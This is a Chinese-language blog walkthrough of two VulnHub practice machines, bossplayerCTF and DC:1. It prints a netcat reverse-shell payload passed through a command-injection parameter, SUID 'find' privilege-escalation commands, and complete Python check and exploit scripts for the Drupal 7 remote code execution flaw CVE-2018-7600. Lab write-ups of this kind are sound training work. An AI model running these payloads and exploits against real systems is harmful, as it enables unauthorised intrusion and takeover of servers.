DC1&&bossplayer-vulnhub渗透测试

前言

bossplayerCTF-vulnhub&&DC:1-vulnhub渗透测试

渗透过程思路比较简单,所以就一起写。

bossplayerCTF-vulnhub

写在前面

靶机IP:192.168.1.168

KaLiIP:192.168.1.124

渗透过程

nmap扫描端口

image-20200225211305509

先访问80端口

image-20200225211534738

在源码中看到

image-20200225211610389

解码后得到workinginprogress.php

image-20200225211800034

这里就猜测这里可以执行命令的

image-20200225211939963

访问robots.txt

image-20200225212032328

解码可得:lol try harder bro

感觉是个无用信息

刚才的那个,我们可以用于反弹shell

1
?cmd=nc+-e+/bin/sh+192.168.1.124+1234

image-20200225212935401

然后find提权

1
find . -exec /bin/sh -p \; -quit

image-20200225213154320

DC:1-vulnhub

写在前面

靶机IP:192.168.1.166

KaLiIP:192.168.1.124

渗透过程

扫描端口

image-20200225214404128

drupal7,我们尝试CVE-2018-7600可否使用。

扫描工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
#!/usr/bin/env python3
#!coding:utf-8
import requests
import re

print ('###################################')
print ('### POC for drupal CVE-2018-7600')
print ('###################################')
print ('\n')

check_host={
'http://192.168.1.166'
}

for host in check_host:
if host[-1::] != '/':
host += '/'

#checking drupal7
print('\n'+'checking host: '+ host)
print('checking drupal 7.x ......')

url = host+'?q=user/password&name[%23post_render][]=system&name[%23markup]=echo%20pwn!!!&name[%23type]=markup'
data = {
'form_id':'user_pass',
'_triggering_element_name':'name'
}
r = requests.post(url,data = data,verify = False,timeout = 5)

result = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)

if result:
found = result.group(1)
url = host + '?q=file/ajax/name/%23value/'+found
data = {'form_build_id' : found}
r = requests.post(url,data = data,verify = False,timeout = 5)

if 'pwn' in r.text:
print('pwn!!!'+'\n'+host)
else:
print('fail')
else:
print('fail')


#checking drupal8
print('\n'+'checking drupal 8.x ......')
payload = {
'mail[a][#lazy_builder][0]':(None,'system'),
'mail[a][#lazy_builder][1][]':(None,'echo pwn!!!'),
'form_id':(None,'user_register_form')
}

headers = {'X-Requested-With': 'XMLHttpRequest'}

url = host+'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
r = requests.post(url,files = payload, headers = headers,verify = False,timeout = 5)

if 'pwn' in r.text:
print('pwn!!!'+'\n'+host)
else:
print('fail')

image-20200225214715082

然后使用exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
#!/usr/bin/env python3

import requests
import argparse
from bs4 import BeautifulSoup

def get_args():
parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7600.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
epilog= '''
This script will exploit the (CVE-2018-7600) vulnerability in Drupal 7 <= 7.57
by poisoning the recover password form (user/password) and triggering it with
the upload file via ajax (/file/ajax).
''')
parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
parser.add_argument("-p", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
args = parser.parse_args()
return args

def pwn_target(target, function, command, proxy):
requests.packages.urllib3.disable_warnings()
proxies = {'http': proxy, 'https': proxy}
print('[*] Poisoning a form and including it in cache.')
get_params = {'q':'user/password', 'name[#post_render][]':function, 'name[#type]':'markup', 'name[#markup]': command}
post_params = {'form_id':'user_pass', '_triggering_element_name':'name', '_triggering_element_value':'', 'opz':'E-mail new Password'}
r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
soup = BeautifulSoup(r.text, "html.parser")
try:
form = soup.find('form', {'id': 'user-pass'})
form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
if form_build_id:
print('[*] Poisoned form ID: ' + form_build_id)
print('[*] Triggering exploit to execute: ' + command)
get_params = {'q':'file/ajax/name/#value/' + form_build_id}
post_params = {'form_build_id':form_build_id}
r = requests.post(target, params=get_params, data=post_params, verify=False, proxies=proxies)
parsed_result = r.text.split('[{"command":"settings"')[0]
print(parsed_result)
except:
print("ERROR: Something went wrong.")
raise

def main():
print ()
print ('=============================================================================')
print ('| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600) |')
print ('| by pimps |')
print ('=============================================================================\n')

args = get_args() # get the cl args
pwn_target(args.target.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())


if __name__ == '__main__':
main()

image-20200225214831475

image-20200225214904577

成功getshell,然后提权

1
2
python -c "import pty; pty.spawn('/bin/bash')"
find -perm -u=s -type f 2>/dev/null

image-20200225215051632

find可提权,然后exim可提取

这里只讲思路了。就不重复了

后记

DC:1是第一个独立做出来的靶机,虽然很简单……

Author: 我是小吴啦
Link: http://yoursite.com/2020/02/25/DC1-bossplayer-vulnhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.